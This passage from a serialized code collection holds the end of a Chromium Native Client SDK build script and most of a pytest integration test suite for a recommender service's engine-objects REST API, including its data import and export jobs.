\'examples/demo\',\n \'examples/tutorial\',\n \'src\'\n ]\n\n tree = parse_dsc.LoadProjectTree(SDK_SRC_DIR, include=filters)\n build_projects.UpdateProjects(pepperdir, tree, clobber=clobber,\n toolchains=dsc_toolchains)\n\n\ndef BuildStepMakeAll(pepperdir, directory, step_name,\n deps=True, clean=False, config=\'Debug\', args=None):\n buildbot_common.BuildStep(step_name)\n build_projects.BuildProjectsBranch(pepperdir, directory, clean,\n deps, config, args)\n\n\ndef BuildStepBuildLibraries(pepperdir, directory):\n BuildStepMakeAll(pepperdir, directory, \'Build Libraries Debug\',\n clean=True, config=\'Debug\')\n BuildStepMakeAll(pepperdir, directory, \'Build Libraries Release\',\n clean=True, config=\'Release\')\n\n # Cleanup .pyc file generated while building libraries. Without\n # this we would end up shipping the pyc in the SDK tarball.\n buildbot_common.RemoveFile(os.path.join(pepperdir, \'tools\', \'*.pyc\'))\n\n\ndef GenerateNotice(fileroot, output_filename=\'NOTICE\', extra_files=None):\n # Look for LICENSE files\n license_filenames_re = re.compile(\'LICENSE|COPYING|COPYRIGHT\')\n\n license_files = []\n for root, _, files in os.walk(fileroot):\n for filename in files:\n if license_filenames_re.match(filename):\n path = os.path.join(root, filename)\n license_files.append(path)\n\n if extra_files:\n license_files += [os.path.join(fileroot, f) for f in extra_files]\n print \'\\n\'.join(license_files)\n\n if not os.path.isabs(output_filename):\n output_filename = os.path.join(fileroot, output_filename)\n generate_notice.Generate(output_filename, fileroot, license_files)\n\n\ndef BuildStepVerifyFilelist(pepperdir):\n buildbot_common.BuildStep(\'Verify SDK Files\')\n file_list_path = os.path.join(SCRIPT_DIR, \'sdk_files.list\')\n try:\n print \'SDK directory: %s\' % pepperdir\n verify_filelist.Verify(file_list_path, pepperdir)\n print \'OK\'\n except verify_filelist.ParseException, e:\n buildbot_common.ErrorExit(\'Parsing sdk_files.list failed:\\n\\n%s\' % e)\n except verify_filelist.VerifyException, e:\n file_list_rel = os.path.relpath(file_list_path)\n verify_filelist_py = os.path.splitext(verify_filelist.__file__)[0] + \'.py\'\n verify_filelist_py = os.path.relpath(verify_filelist_py)\n pepperdir_rel = os.path.relpath(pepperdir)\n\n msg = """"""\\\nSDK verification failed:\n\n%s\nAdd/remove files from %s to fix.\n\nRun:\n ./%s %s %s\nto test."""""" % (e, file_list_rel, verify_filelist_py, file_list_rel,\n pepperdir_rel)\n buildbot_common.ErrorExit(msg)\n\n\ndef BuildStepTarBundle(pepper_ver, tarfile):\n buildbot_common.BuildStep(\'Tar Pepper Bundle\')\n buildbot_common.MakeDir(os.path.dirname(tarfile))\n buildbot_common.Run([sys.executable, CYGTAR, \'-C\', OUT_DIR, \'-cjf\', tarfile,\n \'pepper_\' + pepper_ver], cwd=NACL_DIR)\n\n\ndef GetManifestBundle(pepper_ver, chrome_revision, nacl_revision, tarfile,\n archive_url):\n with open(tarfile, \'rb\') as tarfile_stream:\n archive_sha1, archive_size = manifest_util.DownloadAndComputeHash(\n tarfile_stream)\n\n archive = manifest_util.Archive(manifest_util.GetHostOS())\n archive.url = archive_url\n archive.size = archive_size\n archive.checksum = archive_sha1\n\n bundle = manifest_util.Bundle(\'pepper_\' + pepper_ver)\n bundle.revision = int(chrome_revision)\n bundle.repath = \'pepper_\' + pepper_ver\n bundle.version = int(pepper_ver)\n bundle.description = (\n \'Chrome %s bundle. Chrome revision: %s. NaCl revision: %s\' % (\n pepper_ver, chrome_revision, nacl_revision))\n bundle.stability = \'dev\'\n bundle.recommended = \'no\'\n bundle.archives = [archive]\n return bundle\n\n\ndef Archive(filename, from_directory, step_link=True):\n if buildbot_common.IsSDKBuilder():\n bucket_path = \'nativeclient-mirror/nacl/nacl_sdk/\'\n else:\n bucket_path = \'nativeclient-mirror/nacl/nacl_sdk_test/\'\n bucket_path += build_version.ChromeVersion()\n buildbot_common.Archive(filename, bucket_path, from_directory, step_link)\n\n\ndef BuildStepArchiveBundle(name, pepper_ver, chrome_revision, nacl_revision,\n tarfile):\n buildbot_common.BuildStep(\'Archive %s\' % name)\n tarname = os.path.basename(tarfile)\n tarfile_dir = os.path.dirname(tarfile)\n Archive(tarname, tarfile_dir)\n\n # generate ""manifest snippet"" for this archive.\n archive_url = GSTORE + \'nacl_sdk/%s/%s\' % (\n build_version.ChromeVersion(), tarname)\n bundle = GetManifestBundle(pepper_ver, chrome_revision, nacl_revision,\n tarfile, archive_url)\n\n manifest_snippet_file = os.path.join(OUT_DIR, tarname + \'.json\')\n with open(manifest_snippet_file, \'wb\') as manifest_snippet_stream:\n manifest_snippet_stream.write(bundle.GetDataAsString())\n\n Archive(tarname + \'.json\', OUT_DIR, step_link=False)\n\n\ndef BuildStepBuildPNaClComponent(version, revision):\n # Sadly revision can go backwords for a given version since when a version\n # is built from master, revision will be a huge number (in the hundreds of\n # thousands. Once the branch happens the revision will reset to zero.\n # TODO(sbc): figure out how to compensate for this in some way such that\n # revisions always go forward for a given version.\n buildbot_common.BuildStep(\'PNaCl Component\')\n # Version numbers must follow the format specified in:\n # https://developer.chrome.com/extensions/manifest/version\n # So ensure that rev_major/rev_minor don\'t overflow and ensure there\n # are no leading zeros.\n if len(revision) > 4:\n rev_minor = int(revision[-4:])\n rev_major = int(revision[:-4])\n version = ""0.%s.%s.%s"" % (version, rev_major, rev_minor)\n else:\n version = ""0.%s.0.%s"" % (version, revision)\n buildbot_common.Run([\'./make_pnacl_component.sh\',\n \'pnacl_multicrx_%s.zip\' % revision,\n version], cwd=SCRIPT_DIR)\n\n\ndef BuildStepArchivePNaClComponent(revision):\n buildbot_common.BuildStep(\'Archive PNaCl Component\')\n Archive(\'pnacl_multicrx_%s.zip\' % revision, OUT_DIR)\n\n\ndef BuildStepArchiveSDKTools():\n buildbot_common.BuildStep(\'Build SDK Tools\')\n build_updater.BuildUpdater(OUT_DIR)\n\n buildbot_common.BuildStep(\'Archive SDK Tools\')\n Archive(\'sdk_tools.tgz\', OUT_DIR, step_link=False)\n Archive(\'nacl_sdk.zip\', OUT_DIR, step_link=False)\n\n\ndef BuildStepBuildAppEngine(pepperdir, chrome_revision):\n """"""Build the projects found in src/gonacl_appengine/src""""""\n buildbot_common.BuildStep(\'Build GoNaCl AppEngine Projects\')\n cmd = [\'make\', \'upload\', \'REVISION=%s\' % chrome_revision]\n env = dict(os.environ)\n env[\'NACL_SDK_ROOT\'] = pepperdir\n env[\'NACLPORTS_NO_ANNOTATE\'] = ""1""\n buildbot_common.Run(cmd, env=env, cwd=GONACL_APPENGINE_SRC_DIR)\n\n\ndef main(args):\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\'--qemu\', help=\'Add qemu for ARM.\',\n action=\'store_true\')\n parser.add_argument(\'--tar\', help=\'Force the tar step.\',\n action=\'store_true\')\n parser.add_argument(\'--archive\', help=\'Force the archive step.\',\n action=\'store_true\')\n parser.add_argument(\'--release\', help=\'PPAPI release version.\',\n dest=\'release\', default=None)\n parser.add_argument(\'--build-app-engine\',\n help=\'Build AppEngine demos.\', action=\'store_true\')\n parser.add_argument(\'--experimental\',\n help=\'build experimental examples and libraries\', action=\'store_true\',\n dest=\'build_experimental\')\n parser.add_argument(\'--skip-toolchain\', help=\'Skip toolchain untar\',\n action=\'store_true\')\n parser.add_argument(\'--no-clean\', dest=\'clean\', action=\'store_false\',\n help=""Don\'t clean gypbuild directories"")\n parser.add_argument(\'--mac-sdk\',\n help=\'Set the mac-sdk (e.g. 10.6) to use when building with ninja.\')\n parser.add_argument(\'--no-arm-trusted\', action=\'store_true\',\n help=\'Disable building of ARM trusted components (sel_ldr, etc).\')\n parser.add_argument(\'--no-use-sysroot\', action=\'store_true\',\n help=\'Disable building against sysroot.\')\n\n # To setup bash completion for this command first install optcomplete\n # and then add this line to your .bashrc:\n # complete -F _optcomplete build_sdk.py\n try:\n import optcomplete\n optcomplete.autocomplete(parser)\n except ImportError:\n pass\n\n global options\n options = parser.parse_args(args)\n\n buildbot_common.BuildStep(\'build_sdk\')\n\n if buildbot_common.IsSDKBuilder():\n options.archive = True\n # TODO(binji): re-enable app_engine build when the linux builder stops\n # breaking when trying to git clone from github.\n # See http://crbug.com/412969.\n options.build_app_engine = False\n options.tar = True\n\n # NOTE: order matters here. This will be the order that is specified in the\n # Makefiles; the first toolchain will be the default.\n toolchains = [\'pnacl\', \'x86_glibc\', \'arm_glibc\', \'clang-newlib\', \'host\']\n\n print \'Building: \' + \' \'.join(toolchains)\n platform = getos.GetPlatform()\n\n if options.archive and not options.tar:\n parser.error(\'Incompatible arguments with archive.\')\n\n chrome_version = int(build_version.ChromeMajorVersion())\n chrome_revision = build_version.ChromeRevision()\n nacl_revision = build_version.NaClRevision()\n pepper_ver = str(chrome_version)\n pepper_old = str(chrome_version - 1)\n pepperdir = os.path.join(OUT_DIR, \'pepper_\' + pepper_ver)\n pepperdir_old = os.path.join(OUT_DIR, \'pepper_\' + pepper_old)\n tarname = \'naclsdk_%s.tar.bz2\' % platform\n tarfile = os.path.join(OUT_DIR, tarname)\n\n if options.release:\n pepper_ver = options.release\n print \'Building PEPPER %s at %s\' % (pepper_ver, chrome_revision)\n\n if \'NACL_SDK_ROOT\' in os.environ:\n # We don\'t want the currently configured NACL_SDK_ROOT to have any effect\n # of the build.\n del os.environ[\'NACL_SDK_ROOT\']\n\n if platform == \'linux\':\n # Linux-only: make sure the debian/stable sysroot image is installed\n install_script = os.path.join(SRC_DIR, \'build\', \'linux\', \'sysroot_scripts\',\n \'install-sysroot.py\')\n\n buildbot_common.Run([sys.executable, install_script, \'--arch=arm\'])\n buildbot_common.Run([sys.executable, install_script, \'--arch=i386\'])\n buildbot_common.Run([sys.executable, install_script, \'--arch=amd64\'])\n\n if not options.skip_toolchain:\n BuildStepCleanPepperDirs(pepperdir, pepperdir_old)\n BuildStepMakePepperDirs(pepperdir, [\'include\', \'toolchain\', \'tools\'])\n BuildStepDownloadToolchains(toolchains)\n BuildStepUntarToolchains(pepperdir, toolchains)\n if platform == \'linux\':\n buildbot_common.Move(os.path.join(pepperdir, \'toolchain\', \'arm_trusted\'),\n os.path.join(OUT_DIR, \'arm_trusted\'))\n\n\n if platform == \'linux\':\n # Linux-only: Copy arm libraries from the arm_trusted package. These are\n # needed to be able to run sel_ldr_arm under qemu.\n arm_libs = [\n \'lib/arm-linux-gnueabihf/librt.so.1\',\n \'lib/arm-linux-gnueabihf/libpthread.so.0\',\n \'lib/arm-linux-gnueabihf/libgcc_s.so.1\',\n \'lib/arm-linux-gnueabihf/libc.so.6\',\n \'lib/arm-linux-gnueabihf/ld-linux-armhf.so.3\',\n \'lib/arm-linux-gnueabihf/libm.so.6\',\n \'usr/lib/arm-linux-gnueabihf/libstdc++.so.6\'\n ]\n arm_lib_dir = os.path.join(pepperdir, \'tools\', \'lib\', \'arm_trusted\', \'lib\')\n buildbot_common.MakeDir(arm_lib_dir)\n for arm_lib in arm_libs:\n arm_lib = os.path.join(OUT_DIR, \'arm_trusted\', arm_lib)\n buildbot_common.CopyFile(arm_lib, arm_lib_dir)\n buildbot_common.CopyFile(os.path.join(OUT_DIR, \'arm_trusted\', \'qemu-arm\'),\n os.path.join(pepperdir, \'tools\'))\n\n\n BuildStepBuildToolchains(pepperdir, toolchains,\n not options.skip_toolchain,\n options.clean)\n\n BuildStepUpdateHelpers(pepperdir, True)\n BuildStepUpdateUserProjects(pepperdir, toolchains,\n options.build_experimental, True)\n\n BuildStepCopyTextFiles(pepperdir, pepper_ver, chrome_revision, nacl_revision)\n\n # Ship with libraries prebuilt, so run that first.\n BuildStepBuildLibraries(pepperdir, \'src\')\n GenerateNotice(pepperdir)\n\n # Verify the SDK contains what we expect.\n BuildStepVerifyFilelist(pepperdir)\n\n if options.tar:\n BuildStepTarBundle(pepper_ver, tarfile)\n\n if platform == \'linux\':\n BuildStepBuildPNaClComponent(pepper_ver, chrome_revision)\n\n if options.build_app_engine and platform == \'linux\':\n BuildStepBuildAppEngine(pepperdir, chrome_revision)\n\n if options.qemu:\n qemudir = os.path.join(NACL_DIR, \'toolchain\', \'linux_arm-trusted\')\n oshelpers.Copy([\'-r\', qemudir, pepperdir])\n\n # Archive the results on Google Cloud Storage.\n if options.archive:\n BuildStepArchiveBundle(\'build\', pepper_ver, chrome_revision, nacl_revision,\n tarfile)\n # Only archive sdk_tools/naclport/pnacl_component on linux.\n if platform == \'linux\':\n BuildStepArchiveSDKTools()\n BuildStepArchivePNaClComponent(chrome_revision)\n\n return 0\n\n\nif __name__ == \'__main__\':\n try:\n sys.exit(main(sys.argv[1:]))\n except KeyboardInterrupt:\n buildbot_common.ErrorExit(\'build_sdk: interrupted\')\n', '# MIT License\n\n# Copyright (c) 2016 Diogo Dutra dummy@email.com\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the ""Software""), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nimport asyncio\nimport tempfile\nfrom datetime import datetime\nfrom time import sleep\nfrom unittest import mock\n\nfrom swaggerit.models._base import _all_models\nfrom tests.integration.fixtures import TopSellerArrayTest\n\nimport pytest\nimport ujson\n\n\n@pytest.fixture\ndef init_db(models, session, api):\n user = {\n \'name\': \'test\',\n \'email\': \'test\',\n \'password\': \'test\',\n \'admin\': True\n }\n session.loop.run_until_complete(models[\'users\'].insert(session, user))\n\n tmp = tempfile.TemporaryDirectory()\n store = {\n \'name\': \'test\',\n \'country\': \'test\',\n \'configuration\': {}\n }\n session.loop.run_until_complete(models[\'stores\'].insert(session, store))\n\n item_type = {\n \'name\': \'products\',\n \'schema\': {\n \'type\': \'object\',\n \'id_names\': [\'sku\'],\n \'properties\': {\'sku\': {\'type\': \'string\'}}\n },\n \'stores\': [{\'id\': 1}]\n }\n session.loop.run_until_complete(models[\'item_types\'].insert(session, item_type))\n\n strategy = {\n \'name\': \'test\',\n \'class_module\': \'tests.integration.fixtures\',\n \'class_name\': \'EngineStrategyTest\'\n }\n session.loop.run_until_complete(models[\'engine_strategies\'].insert(session, strategy))\n\n engine_object = {\n \'name\': \'Top Seller Object\',\n \'type\': \'top_seller_array\',\n \'configuration\': {\'days_interval\': 7},\n \'store_id\': 1,\n \'item_type_id\': 1,\n \'strategy_id\': 1\n }\n session.loop.run_until_complete(models[\'engine_objects\'].insert(session, engine_object))\n\n\n yield tmp.name\n\n tmp.cleanup()\n _all_models.pop(\'store_items_products_1\', None)\n\n\nclass TestEngineObjectsModelPost(object):\n\n async def test_post_without_body(self, init_db, client, headers, headers_without_content_type):\n client = await client\n resp = await client.post(\'/engine_objects/\', headers=headers)\n assert resp.status == 400\n assert (await resp.json()) == {\'message\': \'Request body is missing\'}\n\n async def test_post_with_invalid_body(self, init_db, client, headers, headers_without_content_type):\n client = await client\n resp = await client.post(\'/engine_objects/\', headers=headers, data=\'[{}]\')\n assert resp.status == 400\n assert (await resp.json()) == {\n \'message\': ""\'name\' is a required property. ""\\\n ""Failed validating instance[\'0\'] for schema[\'items\'][\'required\']"",\n \'schema\': {\n \'type\': \'object\',\n \'additionalProperties\': False,\n \'required\': [\'name\', \'type\', \'configuration\', \'strategy_id\', \'item_type_id\', \'store_id\'],\n \'properties\': {\n \'name\': {\'type\': \'string\'},\n \'type\': {\'type\': \'string\'},\n \'strategy_id\': {\'type\': \'integer\'},\n \'item_type_id\': {\'type\': \'integer\'},\n \'store_id\': {\'type\': \'integer\'},\n \'configuration\': {}\n }\n }\n }\n\n async def test_post(self, init_db, client, headers, headers_without_content_type):\n client = await client\n body = [{\n \'name\': \'Top Seller Object Test\',\n \'type\': \'top_seller_array\',\n \'configuration\': {\'days_interval\': 7},\n \'store_id\': 1,\n \'item_type_id\': 1,\n \'strategy_id\': 1\n }]\n resp = await client.post(\'/engine_objects/\', headers=headers, data=ujson.dumps(body))\n resp_json = (await resp.json())\n body[0][\'id\'] = 2\n body[0][\'store\'] = resp_json[0][\'store\']\n body[0][\'strategy\'] = resp_json[0][\'strategy\']\n body[0][\'item_type\'] = resp_json[0][\'item_type\']\n\n assert resp.status == 201\n assert resp_json == body\n\n async def test_post_with_invalid_grant(self, client):\n client = await client\n body = [{\n \'name\': \'Top Seller Object Test\',\n \'type\': \'top_seller_array\',\n \'configuration\': {\'days_interval\': 7},\n \'store_id\': 1,\n \'item_type_id\': 1,\n \'strategy_id\': 1\n }]\n resp = await client.post(\'/engine_objects/\', headers={\'Authorization\': \'invalid\'}, data=ujson.dumps(body))\n assert resp.status == 401\n assert (await resp.json()) == {\'message\': \'Invalid authorization\'}\n\n\nclass TestEngineObjectsModelGet(object):\n\n async def test_get_not_found(self, init_db, headers_without_content_type, client):\n client = await client\n resp = await client.get(\n \'/engine_objects/?store_id=2&item_type_id=1&strategy_id=1\',\n headers=headers_without_content_type\n )\n assert resp.status == 404\n\n async def test_get_invalid_with_body(self, init_db, headers, client):\n client = await client\n resp = await client.get(\n \'/engine_objects/?store_id=1&item_type_id=1&strategy_id=1\',\n headers=headers,\n data=\'{}\'\n )\n assert resp.status == 400\n assert await resp.json() == {\'message\': \'Request body is not acceptable\'}\n\n async def test_get_valid(self, init_db, headers, headers_without_content_type, client):\n body = [{\n \'name\': \'Top Seller Object\',\n \'type\': \'top_seller_array\',\n \'configuration\': {""days_interval"": 7},\n \'store_id\': 1,\n \'item_type_id\': 1,\n \'strategy_id\': 1,\n \'id\': 1,\n \'store\': {\n \'id\': 1,\n \'name\': \'test\',\n \'country\': \'test\',\n \'configuration\': {}\n },\n \'item_type\': {\n \'id\': 1,\n \'store_items_class\': None,\n \'stores\': [{\n \'configuration\': {},\n \'country\': \'test\',\n \'id\': 1,\n \'name\': \'test\'\n }],\n \'name\': \'products\',\n \'schema\': {\n \'type\': \'object\',\n \'id_names\': [\'sku\'],\n \'properties\': {\'sku\': {\'type\': \'string\'}}\n },\n \'available_filters\': [{\'name\': \'sku\', \'schema\': {\'type\': \'string\'}}]\n },\n \'strategy\': {\n \'id\': 1,\n \'name\': \'test\',\n \'class_module\': \'tests.integration.fixtures\',\n \'class_name\': \'EngineStrategyTest\',\n \'object_types\': [\'top_seller_array\']\n }\n }]\n\n client = await client\n resp = await client.get(\n \'/engine_objects/?store_id=1&item_type_id=1&strategy_id=1\',\n headers=headers_without_content_type\n )\n assert resp.status == 200\n assert await resp.json() == body\n\n\nclass TestEngineObjectsModelUriTemplatePatch(object):\n\n async def test_patch_without_body(self, init_db, client, headers, headers_without_content_type):\n client = await client\n resp = await client.patch(\'/engine_objects/1/\', headers=headers, data=\'\')\n assert resp.status == 400\n assert (await resp.json()) == {\'message\': \'Request body is missing\'}\n\n async def test_patch_with_invalid_body(self, init_db, client, headers, headers_without_content_type):\n client = await client\n resp = await client.patch(\'/engine_objects/1/\', headers=headers, data=\'{}\')\n assert resp.status == 400\n assert (await resp.json()) == {\n \'message\': \'{} does not have enough properties. \'\\\n ""Failed validating instance for schema[\'minProperties\']"",\n \'schema\': {\n \'type\': \'object\',\n \'additionalProperties\': False,\n \'minProperties\': 1,\n \'properties\': {\n \'name\': {\'type\': \'string\'},\n \'configuration\': {}\n }\n }\n }\n\n async def test_patch_with_invalid_config(self, init_db, client, headers, headers_without_content_type):\n client = await client\n body = {\n \'configuration\': {}\n }\n resp = await client.patch(\'/engine_objects/1/\', headers=headers, data=ujson.dumps(body))\n assert resp.status == 400\n print(ujson.dumps(await resp.json(), indent=4))\n assert (await resp.json()) == {\n \'message\': ""\'days_interval\' is a required property. ""\\\n ""Failed validating instance for schema[\'required\']"",\n \'schema\': {\n \'type\': \'object\',\n \'required\': [\'days_interval\'],\n \'additionalProperties\': False,\n \'properties\': {\n \'days_interval\': {\'type\': \'integer\'}\n }\n }\n }\n\n async def test_patch_not_found(self, init_db, client, headers, headers_without_content_type):\n client = await client\n body = {\n \'name\': \'Top Seller Object Test\'\n }\n resp = await client.patch(\'/engine_objects/2/\', headers=headers, data=ujson.dumps(body))\n assert resp.status == 404\n\n async def test_patch(self, init_db, client, headers, headers_without_content_type):\n client = await client\n body = [{\n \'name\': \'Top Seller Object Test\',\n \'type\': \'top_seller_array\',\n \'configuration\': {\'days_interval\': 7},\n \'store_id\': 1,\n \'item_type_id\': 1,\n \'strategy_id\': 1\n }]\n resp = await client.post(\'/engine_objects/\', headers=headers, data=ujson.dumps(body))\n obj = (await resp.json())[0]\n\n body = {\n \'name\': \'test2\'\n }\n resp = await client.patch(\'/engine_objects/2/\', headers=headers, data=ujson.dumps(body))\n obj[\'name\'] = \'test2\'\n\n assert resp.status == 200\n assert (await resp.json()) == obj\n\n\nclass TestEngineObjectsModelUriTemplateGet(object):\n\n async def test_get_with_body(self, init_db, headers, client):\n client = await client\n resp = await client.get(\'/engine_objects/1/\', headers=headers, data=\'{}\')\n assert resp.status == 400\n assert await resp.json() == {\'message\': \'Request body is not acceptable\'}\n\n async def test_get_not_found(self, init_db, headers_without_content_type, client):\n client = await client\n resp = await client.get(\'/engine_objects/2/\', headers=headers_without_content_type)\n assert resp.status == 404\n\n async def test_get(self, init_db, headers, headers_without_content_type, client):\n client = await client\n resp = await client.get(\'/engine_objects/1/\', headers=headers_without_content_type)\n body = {\n \'name\': \'Top Seller Object\',\n \'type\': \'top_seller_array\',\n \'configuration\': {""days_interval"": 7},\n \'store_id\': 1,\n \'item_type_id\': 1,\n \'strategy_id\': 1,\n \'id\': 1,\n \'store\': {\n \'id\': 1,\n \'name\': \'test\',\n \'country\': \'test\',\n \'configuration\': {}\n },\n \'item_type\': {\n \'id\': 1,\n \'store_items_class\': None,\n \'stores\': [{\n \'configuration\': {},\n \'country\': \'test\',\n \'id\': 1,\n \'name\': \'test\'\n }],\n \'name\': \'products\',\n \'schema\': {\n \'type\': \'object\',\n \'id_names\': [\'sku\'],\n \'properties\': {\'sku\': {\'type\': \'string\'}}\n },\n \'available_filters\': [{\'name\': \'sku\', \'schema\': {\'type\': \'string\'}}]\n },\n \'strategy\': {\n \'id\': 1,\n \'name\': \'test\',\n \'class_module\': \'tests.integration.fixtures\',\n \'class_name\': \'EngineStrategyTest\',\n \'object_types\': [\'top_seller_array\']\n }\n }\n\n assert resp.status == 200\n assert await resp.json() == body\n\n\nclass TestEngineObjectsModelUriTemplateDelete(object):\n\n async def test_delete_with_body(self, init_db, client, headers):\n client = await client\n\n resp = await client.delete(\'/engine_objects/1/\', headers=headers, data=\'{}\')\n assert resp.status == 400\n assert (await resp.json()) == {\'message\': \'Request body is not acceptable\'}\n\n async def test_delete_valid(self, init_db, client, headers, headers_without_content_type):\n client = await client\n\n resp = await client.get(\'/engine_objects/1/\', headers=headers_without_content_type)\n assert resp.status == 200\n\n resp = await client.delete(\'/engine_objects/1/\', headers=headers_without_content_type)\n assert resp.status == 204\n\n resp = await client.get(\'/engine_objects/1/\', headers=headers_without_content_type)\n assert resp.status == 404\n\n\ndef datetime_mock():\n mock_ = mock.MagicMock()\n mock_.now.return_value = datetime(1900, 1, 1)\n return mock_\n\n\nasync def _wait_job_finish(client, headers_without_content_type, job_name=\'export\'):\n sleep(0.05)\n while True:\n resp = await client.get(\n \'/engine_objects/1/{}?PI:KEY\'.format(job_name),\n headers=headers_without_content_type)\n if (await resp.json())[\'status\'] != \'running\':\n break\n\n return resp\n\n\ndef set_patches(monkeypatch):\n monkeypatch.setattr(\'swaggerit.models.orm._jobs_meta.random.getrandbits\',\n mock.MagicMock(return_value=131940827655846590526331314439483569710))\n monkeypatch.setattr(\'swaggerit.models.orm._jobs_meta.datetime\', datetime_mock())\n\n\nclass TestEngineObjectsModelsDataImporter(object):\n\n async def test_importer_post(self, init_db, headers, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n resp = await client.post(\'/engine_objects/1/import_data\', headers=headers_without_content_type)\n\n assert resp.status == 201\n assert await resp.json() == {\'job_hash\': \'6342e10bd7dca3240c698aa79c98362e\'}\n await _wait_job_finish(client, headers_without_content_type, \'import_data\')\n\n async def test_importer_get_running(self, init_db, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await client.post(\'/engine_objects/1/import_data\', headers=headers_without_content_type)\n resp = await client.get(\'/engine_objects/1/import_data?PI:KEY\',\n headers=headers_without_content_type)\n\n assert await resp.json() == {\'status\': \'running\'}\n await _wait_job_finish(client, headers_without_content_type, \'import_data\')\n\n\n async def test_importer_get_done(self, init_db, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await client.post(\'/engine_objects/1/import_data\', headers=headers_without_content_type)\n\n resp = await _wait_job_finish(client, headers_without_content_type, \'import_data\')\n\n assert await resp.json() == {\n \'status\': \'done\',\n \'result\': {\'lines_count\': 3},\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n\n async def test_importer_get_with_error(self, init_db, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n monkeypatch.setattr(\'tests.integration.fixtures.TopSellerArrayTest.get_data\',\n mock.MagicMock(side_effect=Exception(\'testing\')))\n client = await client\n await client.post(\'/engine_objects/1/import_data\', headers=headers_without_content_type)\n\n resp = await _wait_job_finish(client, headers_without_content_type, \'import_data\')\n\n assert await resp.json() == {\n \'status\': \'error\',\n \'result\': {\'message\': \'testing\', \'name\': \'Exception\'},\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n\n\nasync def _post_products(client, headers, headers_without_content_type, products=[{\'sku\': \'test\'}]):\n resp = await client.post(\'/item_types/1/items?store_id=1\',\n data=ujson.dumps(products), headers=headers)\n resp = await client.post(\'/item_types/1/update_filters?store_id=1\',\n headers=headers_without_content_type)\n\n sleep(0.05)\n while True:\n resp = await client.get(\n \'/item_types/1/update_filters?store_id=1&PI:KEY\',\n headers=headers_without_content_type)\n if (await resp.json())[\'status\'] != \'running\':\n break\n\n return resp\n\n\ndef set_readers_builders_patch(monkeypatch, values=None):\n if values is None:\n values = [[ujson.dumps({\'value\': 1, \'item_key\': \'test\'}).encode()]]\n\n readers_builder = values\n mock_ = mock.MagicMock()\n mock_.return_value = readers_builder\n\n monkeypatch.setattr(\n \'myreco.engine_objects.object_base.EngineObjectBase._build_csv_readers\',\n mock_\n )\n\n\nclass TestEngineObjectsModelsObjectsExporter(object):\n\n async def test_exporter_post(self, init_db, headers_without_content_type, headers, client, monkeypatch):\n set_patches(monkeypatch)\n set_readers_builders_patch(monkeypatch)\n \n client = await client\n await _post_products(client, headers, headers_without_content_type)\n resp = await client.post(\'/engine_objects/1/export\', headers=headers_without_content_type)\n\n assert await resp.json() == {\'job_hash\': \'6342e10bd7dca3240c698aa79c98362e\'}\n await _wait_job_finish(client, headers_without_content_type)\n\n async def test_exporter_get_running(self, init_db, headers_without_content_type, headers, client, monkeypatch, loop):\n set_patches(monkeypatch)\n\n prods = [ujson.dumps({\'value\': i, \'item_key\': \'test{}\'.format(i)}).encode() for i in range(100)]\n set_readers_builders_patch(monkeypatch, [[b\'\\n\'.join(prods)]])\n\n client = await client\n products = [{\'sku\': \'test{}\'.format(i)} for i in range(10)]\n\n await _post_products(client, headers, headers_without_content_type, products)\n await client.post(\'/engine_objects/1/export\', headers=headers_without_content_type)\n\n resp = await client.get(\n \'/engine_objects/1/export?PI:KEY\', headers=headers_without_content_type)\n\n assert await resp.json() == {\'status\': \'running\'}\n await _wait_job_finish(client, headers_without_content_type)\n\n async def test_exporter_get_done(self, init_db, headers_without_content_type, headers, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await _post_products(client, headers, headers_without_content_type)\n\n set_readers_builders_patch(monkeypatch)\n\n await client.post(\'/engine_objects/1/export\', headers=headers_without_content_type)\n\n resp = await _wait_job_finish(client, headers_without_content_type)\n\n assert await resp.json() == {\n \'status\': \'done\',\n \'result\': {\'length\': 1, \'max_sells\': 1, \'min_sells\': 1},\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n\n async def test_exporter_get_with_error(\n self, init_db, headers_without_content_type, headers, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await _post_products(client, headers, headers_without_content_type)\n\n set_readers_builders_patch(monkeypatch, [])\n await client.post(\'/engine_objects/1/export\', headers=headers_without_content_type)\n\n resp = await _wait_job_finish(client, headers_without_content_type)\n\n assert await resp.json() == {\n \'status\': \'error\',\n \'result\': {\n \'message\': ""No data found for engine object \'Top Seller Object\'"",\n \'name\': \'EngineError\'\n },\n \'time_info\': {\n \'elapsed\': \'0:00\',\n \'start\': \'1900-01-01 00:00\',\n \'end\': \'1900-01-01 00:00\'\n }\n }\n\n\ndef CoroMock():\n coro = mock.MagicMock(name=""CoroutineResult"")\n corofunc = mock.MagicMock(name=""CoroutineFunction"", side_effect=asyncio.coroutine(coro))\n corofunc.coro = 